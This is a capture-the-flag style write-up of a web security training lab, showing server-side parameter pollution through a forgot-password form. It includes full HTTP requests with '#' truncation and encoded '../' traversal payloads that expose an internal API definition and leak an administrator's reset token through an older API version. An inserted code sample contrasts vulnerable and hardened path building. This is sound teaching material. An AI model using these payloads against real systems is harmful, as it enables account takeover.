âŗ
Ichyaboy
Exploiting server side parameter pollution in a REST URL

Description

To solve the lab, log in as the administrator and delete carlos.

Approach

After accessing the lab, I enabled the FoxyProxy extension to proxy all my requests through Burp Suite. Two requests got my attention: one fetching a JavaScript file and the other a POST request to /forgot-password.

Starting with the GET /static/js/forgotPassword.js, there is an interesting part in the JavaScript script:

forgotPwdReady(() => {
    const queryString = window.location.search;
    const urlParams = new URLSearchParams(queryString);
    // Read the reset-token query parameter, if one was supplied
    const resetToken = urlParams.get('reset-token');
    if (resetToken)
    {
        // Hand the token to the reset form under the passwordResetToken parameter
        window.location.href = `/forgot-password?passwordResetToken=${resetToken}`;
    }
});

This part reads the reset-token query parameter and checks whether it exists. If it does, it redirects with a GET request to /forgot-password, passing the value as passwordResetToken.

From this information, I can build an attack path to get the administrator's passwordResetToken, reset their password, log in as them, and delete the user Carlos.

I started working on how to get the passwordResetToken of the administrator. I went to the POST /forgot-password request and sent it to Repeater in Burp Suite to start working on it. I started by truncating the query string with the # character:

POST /forgot-password HTTP/2
Host: 0ada009f03b2058781472faf00550026.web-security-academy.net
Cookie: session=bb7bjqWIY6WBTvIkezybzDfZtiBq6cJP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

csrf=vBr4ih5Bd22dgiBe4Pkw1y2jCUgSgVDX&username=administrator%23

I got this error:

HTTP/2 404 Not Found
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 86

{
  "type": "error",
  "result": "Invalid route. Please refer to the API definition"
}

From this, I understood that the truncation worked, but it also cut off the rest of the internal path, so the request no longer matched any route. To clarify, imagine this is the normal route:

/api/library/books/{book}/category/{category}

And I sent this:

book=HarryPotter%23

The internal URL would become:

/api/library/books/HarryPotter%23

That's not a valid route, so the API triggers an error indicating an invalid route.

Going back to the analysis, I tried path traversal with common API definition file names, starting with the one mentioned in the course: openapi.json. After some attempts, I got a response by passing this payload URL-encoded: administrator../../../../../../openapi.json#.

POST /forgot-password HTTP/2
Host: 0a6c0098037e13ea8498ef4300610096.web-security-academy.net
Cookie: session=XbOEOAYYSZi87jCb2i9UU15zZ1cuXzU0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

csrf=U88ffUCmJXnGrgX1KCtUrJMDSAk6WlI0&username=administrator%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fopenapi.json%23

The response was:

HTTP/2 500 Internal Server Error
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 629

{
  "error": "Unexpected response from API server:
{
  "openapi": "3.0.0",
  "info": {
    "title": "User API",
    "version": "2.0.0"
  },
  "paths": {
    "/api/internal/v1/users/{username}/field/{field}": {
      "get": {
        "tags": [
          "users"
        ],
        "summary": "Find user by username",
        "description": "API Version 1",
        "parameters": [
          {
            "name": "username",
            "in": "path",
            "description": "Username",
            "required": true,
            "schema": {
        ..."
}

From this, I could see the /api/internal/v1/users/{username}/field/{field} route, which explained the invalid route error I was getting: the username is inserted into that path, and the # had cut off everything after it.
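To make the mechanics concrete, here is an added example (not code from the lab or from the original writeup) that reproduces how a raw username lands in an internal REST path shaped like the one disclosed above, and how an allowlist plus percent-encoding prevents it. The internal host and the v2 route are assumptions modelled on the OpenAPI document, and the sample inputs are constructed from the payloads used in this writeup.

```javascript
// Added example, not the lab's real backend. Assumed route shape follows the
// disclosed OpenAPI path /api/internal/{version}/users/{username}/field/{field}.
const INTERNAL_BASE = "http://internal-api.invalid"; // assumed, non-resolvable host

// Vulnerable pattern: the untrusted username is concatenated straight into the
// path. URL parsing then resolves ".." segments and treats "#" as the start of
// a fragment, so the caller-controlled part can rewrite the whole route.
function buildInternalPathVulnerable(username) {
  const raw = `${INTERNAL_BASE}/api/internal/v2/users/${username}/field/email`;
  return new URL(raw).pathname;
}

// Hardened pattern: allowlist the username, percent-encode the segment anyway,
// and keep the field name server-controlled so only "email" is ever requested.
const USERNAME_RE = /^[A-Za-z0-9_-]{1,64}$/;

function buildInternalPathSafe(username) {
  if (!USERNAME_RE.test(username)) {
    throw new Error("rejected username: not in allowlist");
  }
  const segment = encodeURIComponent(username);
  const raw = `${INTERNAL_BASE}/api/internal/v2/users/${segment}/field/email`;
  return new URL(raw).pathname;
}

// Constructed inputs echoing the payloads sent in the writeup.
const SAMPLES = [
  "administrator",
  "administrator/field/passwordResetToken#",
  "../../v1/users/administrator/field/passwordResetToken#",
];

function demo() {
  for (const s of SAMPLES) {
    console.log(`input: ${s}`);
    console.log(`  vulnerable -> ${buildInternalPathVulnerable(s)}`);
    try {
      console.log(`  hardened   -> ${buildInternalPathSafe(s)}`);
    } catch (e) {
      console.log(`  hardened   -> ${e.message}`);
    }
  }
}

demo();
```

The vulnerable builder shows the field segment being dropped by the # and the version segment being walked back to v1; the hardened builder never lets either happen, and retiring the v1 endpoint (or applying the same field restriction there) closes the remaining gap.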

I decided to go for the reset token of the administrator:

POST /forgot-password HTTP/2
Host: 0a6c0098037e13ea8498ef4300610096.web-security-academy.net
Cookie: session=XbOEOAYYSZi87jCb2i9UU15zZ1cuXzU0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

csrf=U88ffUCmJXnGrgX1KCtUrJMDSAk6WlI0&username=administrator/field/passwordResetToken%23

I got this error:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 107

{
  "type": "error",
  "result": "This version of API only supports the email field for security reasons"
}

I couldn't get it this way, but the documentation showed the API was at version 2.0.0. I confirmed this by requesting the token again through a full path with the version explicitly set to v2:

../../v2/users/administrator/field/passwordResetToken#

When sending this request:

POST /forgot-password HTTP/2
Host: 0a6c0098037e13ea8498ef4300610096.web-security-academy.net
Cookie: session=XbOEOAYYSZi87jCb2i9UU15zZ1cuXzU0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

csrf=U88ffUCmJXnGrgX1KCtUrJMDSAk6WlI0&username=%2e%2e%2f%2e%2e%2fv2/users/administrator/field/passwordResetToken%23

I got the same error, confirming my theory:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 107

{
  "type": "error",
  "result": "This version of API only supports the email field for security reasons"
}

Now, I tried using an older version, version 1, to see if it worked:

POST /forgot-password HTTP/2
Host: 0a6c0098037e13ea8498ef4300610096.web-security-academy.net
Cookie: session=XbOEOAYYSZi87jCb2i9UU15zZ1cuXzU0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

csrf=U88ffUCmJXnGrgX1KCtUrJMDSAk6WlI0&username=%2e%2e%2f%2e%2e%2fv1/users/administrator/field/passwordResetToken%23

I got the reset token in the response:

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 82

{
  "type": "passwordResetToken",
  "result": "pgjg38611p8vj5bozjcc0e0r5u3mjiso"
}

Now, by sending this request:

GET /forgot-password?passwordResetToken=pgjg38611p8vj5bozjcc0e0r5u3mjiso HTTP/2
Host: 0a6c0098037e13ea8498ef4300610096.web-security-academy.net
Cookie: session=XbOEOAYYSZi87jCb2i9UU15zZ1cuXzU0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

In the response, I could see the password reset page for the administrator user. By right-clicking the response and choosing Show response in browser, I could copy the URL into the browser and reset the administrator's password. Finally, I logged in as the administrator and deleted the user Carlos, which solved the lab.
